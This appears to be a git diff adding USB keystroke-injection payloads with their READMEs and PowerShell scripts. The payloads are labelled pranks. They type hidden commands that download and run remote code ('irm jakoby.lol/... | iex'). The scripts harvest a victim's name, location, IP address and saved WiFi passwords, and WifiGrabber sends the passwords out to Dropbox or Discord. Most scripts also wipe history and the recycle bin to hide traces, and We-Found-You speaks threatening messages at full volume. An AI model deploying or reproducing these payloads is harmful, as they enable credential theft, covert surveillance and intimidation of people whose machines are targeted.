+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex
+DELAY 500
+ENTER
diff --git a/Payloads/Wallpaper-Troll/README.md b/Payloads/Wallpaper-Troll/README.md
new file mode 100644
index 0000000..0d21efa
--- /dev/null
+++ b/Payloads/Wallpaper-Troll/README.md
@@ -0,0 +1,110 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Wallpaper-Troll
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
+
+## Description
+
+This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords. This information will be saved to a file that is then converted to a .BMP image. That image will be saved to their desktop and saved as their wallpaper. Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file.
+
+
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-RestMethod will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Wallpaper-Troll/Wallpaper-Troll.ps1 b/Payloads/Wallpaper-Troll/Wallpaper-Troll.ps1
new file mode 100644
index 0000000..186e44d
--- /dev/null
+++ b/Payloads/Wallpaper-Troll/Wallpaper-Troll.ps1
@@ -0,0 +1,432 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+
+.DESCRIPTION
+ This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
+ Public IP, the SSID, and WiFi password of any current or previously connected to networks.
+ It will take the gathered information and generate a .jpg with that information on show.
+ Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned.
+ Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop.
+#>
+#############################################################################################################################################
+
+# this is the message that will be coded into the image you use as the wallpaper
+
+$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
+
+# this will be the name of the image you use as the wallpaper
+
+$ImageName = "dont-be-suspicious"
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get the name associated with the microsoft account
+#>
+
+ function Get-Name {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fn = Get-Name
+
+echo "Hey" $fn >> $Env:temp\foo.txt
+
+echo "`nYour computer is not very secure" >> $Env:temp\foo.txt
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This is to get the current Latitude and Longitude of your target
+#>
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current location
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GL = $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
+ if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+Get-GeoLocation
+#if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
+
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get the public IP from the target computer
+#>
+
+
+function Get-PubIP {
+
+ try {
+
+ $computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
+
+ }
+
+ # If no Public IP is detected function will return $null to avoid sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No Public IP was detected"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+
+ return $computerPubIP
+}
+
+$PubIP = Get-PubIP
+if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt }
+
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ Password last Set
+ This function will custom tailor a response based on how long it has been since they last changed their password
+#>
+
+
+ function Get-Days_Set {
+
+ #-----VARIABLES-----#
+ # $pls (password last set) = the date/time their password was last changed
+ # $days = the number of days since their password was last changed
+
+ try {
+
+ $pls = net user $env:USERNAME | Select-String -Pattern "Password last" ; $pls = [string]$pls
+ $plsPOS = $pls.IndexOf("e")
+ $pls = $pls.Substring($plsPOS+2).Trim()
+ $pls = $pls -replace ".{3}$"
+ $time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
+ $DateArray =$time.Split(".")
+ $days = [int]$DateArray[0]
+ return $pls
+
+ }
+
+ # If no password set date is detected function will return $null to cancel Sapi Speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "Day password set not found"
+ return $null
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$pls = Get-Days_Set
+if ($pls) { echo "`nPassword Last Set: $pls" >> $Env:temp\foo.txt }
+
+
+###########################################################################################################
+
+<#
+
+.NOTES
+ All Wifi Networks and Passwords
+ This function will gather all current Networks and Passwords saved on the target computer
+ They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
+#>
+
+
+# Get Network Interfaces
+$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
+
+# Get Wifi SSIDs and Passwords
+$WLANProfileNames =@()
+
+#Get all the WLAN profile names
+$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
+
+#Trim the output to receive only the name
+Foreach($WLANProfileName in $Output){
+ $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
+}
+$WLANProfileObjects =@()
+
+#Bind the WLAN profile names and also the password to a custom object
+Foreach($WLANProfileName in $WLANProfileNames){
+
+ #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
+ try{
+ $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
+ }Catch{
+ $WLANProfilePassword = "The password is not stored in this profile"
+ }
+
+ #Build the object and add this to an array
+ $WLANProfileObject = New-Object PSCustomobject
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
+ $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
+ $WLANProfileObjects += $WLANProfileObject
+ Remove-Variable WLANProfileObject
+}
+ if (!$WLANProfileObjects) { Write-Host "variable is null"
+ }else {
+
+ # This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage
+
+ echo "`nW-Lan profiles: ===============================" $WLANProfileObjects >> $Env:temp\foo.txt
+
+$content = [IO.File]::ReadAllText("$Env:temp\foo.txt")
+ }
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get the dimension of the targets screen to make the wallpaper
+#>
+
+Add-Type @"
+using System;
+using System.Runtime.InteropServices;
+public class PInvoke {
+ [DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
+ [DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
+}
+"@
+$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
+$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
+$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will get take the information gathered and format it into a .jpg
+#>
+
+Add-Type -AssemblyName System.Drawing
+
+$filename = "$env:tmp\foo.jpg"
+$bmp = new-object System.Drawing.Bitmap $w,$h
+$font = new-object System.Drawing.Font Consolas,18
+$brushBg = [System.Drawing.Brushes]::White
+$brushFg = [System.Drawing.Brushes]::Black
+$graphics = [System.Drawing.Graphics]::FromImage($bmp)
+$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
+$graphics.DrawString($content,$font,$brushFg,500,100)
+$graphics.Dispose()
+$bmp.Save($filename)
+
+# Invoke-Item $filename
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
+ Then it will clean up the files you don't want to leave behind
+#>
+
+echo $hiddenMessage > $Env:temp\foo.txt
+cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
+
+rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
+
+
+#############################################################################################################################################
+
+<#
+
+.NOTES
+ This will take the image you generated and set it as the targets wall paper
+#>
+
+Function Set-WallPaper {
+
+<#
+
+ .SYNOPSIS
+ Applies a specified wallpaper to the current user's desktop
+
+ .PARAMETER Image
+ Provide the exact path to the image
+
+ .PARAMETER Style
+ Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
+
+ .EXAMPLE
+ Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
+ Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
+
+#>
+
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+#----------------------------------------------------------------------------------------------------
+
+function clean-exfil {
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+}
+
+#----------------------------------------------------------------------------------------------------
+
+function Target-Comes {
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+
+Target-Comes
+
+Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
+
+clean-exfil
+
diff --git a/Payloads/Wallpaper-Troll/Wallpaper-Troll.txt b/Payloads/Wallpaper-Troll/Wallpaper-Troll.txt
new file mode 100644
index 0000000..681db45
--- /dev/null
+++ b/Payloads/Wallpaper-Troll/Wallpaper-Troll.txt
@@ -0,0 +1,20 @@
+REM Title: Wallpaper-Troll
+REM
+REM Author: I am Jakoby
+REM
+REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details.
+REM
+REM Target: Windows 10, 11
+REM
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload.
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+REM
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+REM
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/b8n | iex
+DELAY 500
+ENTER
diff --git a/Payloads/Wallpaper-Troll/wp-troll.jpg b/Payloads/Wallpaper-Troll/wp-troll.jpg
new file mode 100644
index 0000000..f6263bc
Binary files /dev/null and b/Payloads/Wallpaper-Troll/wp-troll.jpg differ
diff --git a/Payloads/We-Found-You/README.md b/Payloads/We-Found-You/README.md
new file mode 100644
index 0000000..010b557
--- /dev/null
+++ b/Payloads/We-Found-You/README.md
@@ -0,0 +1,114 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# We-Found-You
+
+This script is ready to run as is. Just download and execute with the provided link.
+
+## Description
+
+This script will get the GeoLocation (Latitude and Longitude) of your target.
+Then a page will open in their browser with a map of their current location on it.
+Their system volume will be turned to max level.
+SAPI speak with talk through their speakers the message provided or a custom one you provide.
+
+
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+* Their location services are turned on
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/We-Found-You/We-Found-You.txt b/Payloads/We-Found-You/We-Found-You.txt
new file mode 100644
index 0000000..4718610
--- /dev/null
+++ b/Payloads/We-Found-You/We-Found-You.txt
@@ -0,0 +1,16 @@
+REM Title: We-Found-You
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to open a map in your target's web browser with their current location.
+
+REM Target: Windows 10, 11
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/yzb | iex
+ENTER
diff --git a/Payloads/We-Found-You/found-you.ps1 b/Payloads/We-Found-You/found-you.ps1
new file mode 100644
index 0000000..c4be40e
--- /dev/null
+++ b/Payloads/We-Found-You/found-you.ps1
@@ -0,0 +1,177 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ The target's Location Services must be turned on or this payload will not work.
+
+.SYNOPSIS
+ This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are.
+
+.DESCRIPTION
+ This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account.
+ The SSID and WiFi password of any current or previously connected to networks.
+ It determines the last day they changed their password and how many days ago.
+ Once the information is gathered, the script will pause until a mouse movement is detected.
+ Then the script uses Sapi speak to roast their set up and lack of security.
+#>
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to get the name associated with the targets Microsoft account, if not detected UserName will be used.
+#>
+
+function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$FN = Get-fullName
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to get the current Latitude and Longitude of your target
+#>
+
+function Get-GeoLocation{
+ try {
+ Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
+ $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
+ $GeoWatcher.Start() #Begin resolving current locaton
+
+ while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
+ Start-Sleep -Milliseconds 100 #Wait for discovery.
+ }
+
+ if ($GeoWatcher.Permission -eq 'Denied'){
+ Write-Error 'Access Denied for Location Information'
+ } else {
+ $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
+
+ }
+ }
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No coordinates found"
+ return "No Coordinates found"
+ -ErrorAction SilentlyContinue
+ }
+
+}
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+$GL = Get-GeoLocation
+
+$GL = $GL -split " "
+
+$Lat = $GL[0].Substring(11) -replace ".$"
+
+$Lon = $GL[1].Substring(10) -replace ".$"
+
+Pause-Script
+
+# Opens their browser with a map of their current location
+
+Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon"
+
+Start-Sleep -s 3
+
+# Sets Volume to max level
+
+$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+# Sets up speech module
+
+$s=New-Object -ComObject SAPI.SpVoice
+$s.Rate = -2
+$s.Speak("We found you $FN")
+$s.Speak("We know where you are")
+$s.Speak("We are everywhere")
+$s.Speak("We do not forgive, we do not forget")
+$s.Speak("Expect us")
+
+
+#-----------------------------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/Payloads/We-Found-You/location.jpg b/Payloads/We-Found-You/location.jpg
new file mode 100644
index 0000000..7b6e943
Binary files /dev/null and b/Payloads/We-Found-You/location.jpg differ
diff --git a/Payloads/WifiGrabber/README.md b/Payloads/WifiGrabber/README.md
new file mode 100644
index 0000000..0394189
--- /dev/null
+++ b/Payloads/WifiGrabber/README.md
@@ -0,0 +1,111 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Wifi-Grabber
+
+## Description
+
+This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+
+`$dc` is the variable that stores your Discord webhook
+
+`$db` is the variable that stores your Dropbox token
+
+Fill in either or both of these to methods to exfil your collected data
+
+```
+powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/WifiGrabber/WifiGrabber.ps1 b/Payloads/WifiGrabber/WifiGrabber.ps1
new file mode 100644
index 0000000..3dfec32
--- /dev/null
+++ b/Payloads/WifiGrabber/WifiGrabber.ps1
@@ -0,0 +1,86 @@
+############################################################################################################################################################
+
+$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
+
+
+$wifiProfiles > $env:TEMP/--wifi-pass.txt
+
+############################################################################################################################################################
+
+# Upload output file to Dropbox
+
+function DropBox-Upload {
+
+[CmdletBinding()]
+param (
+
+[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+[Alias("f")]
+[string]$SourceFilePath
+)
+$outputFile = Split-Path $SourceFilePath -leaf
+$TargetFilePath="/$outputFile"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TEMP/--wifi-pass.txt}
+
+############################################################################################################################################################
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:TEMP/--wifi-pass.txt"}
+
+
+
+############################################################################################################################################################
+
+function Clean-Exfil {
+
+# empty temp folder
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# delete run box history
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue
+
+# Empty recycle bin
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+}
+
+############################################################################################################################################################
+
+if (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}
+
+
+RI $env:TEMP/--wifi-pass.txt
diff --git a/Payloads/WifiGrabber/WifiGrabber.txt b/Payloads/WifiGrabber/WifiGrabber.txt
new file mode 100644
index 0000000..77388c8
--- /dev/null
+++ b/Payloads/WifiGrabber/WifiGrabber.txt
@@ -0,0 +1,12 @@
+REM Title: Wifi Grabber
+
+REM Author: I am Jakoby
+
+REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
+ENTER
diff --git a/Payloads/YT-Tripwire/ReadMe.md b/Payloads/YT-Tripwire/ReadMe.md
new file mode 100644
index 0000000..8d37495
--- /dev/null
+++ b/Payloads/YT-Tripwire/ReadMe.md
@@ -0,0 +1,123 @@
+
+
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# YouTube Tripwire
+
+Plays any YouTube video after a mouse movement is detected.
+
+## Description
+
+This script is a one liner that can fit in the runbox by itself.
+Just replace the URL for the YouTube video and run it.
+You can now unplug your device and walk away.
+When your target returns and moves their mouse, the video will start playing full screen.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Walk away
+* You can run the example snippet below and it will open up a video covering one of my other payloads
+* You can of course replace the URL with your own video
+```
+powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')
+```
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+(back to top)
+
+
+## Acknowledgments
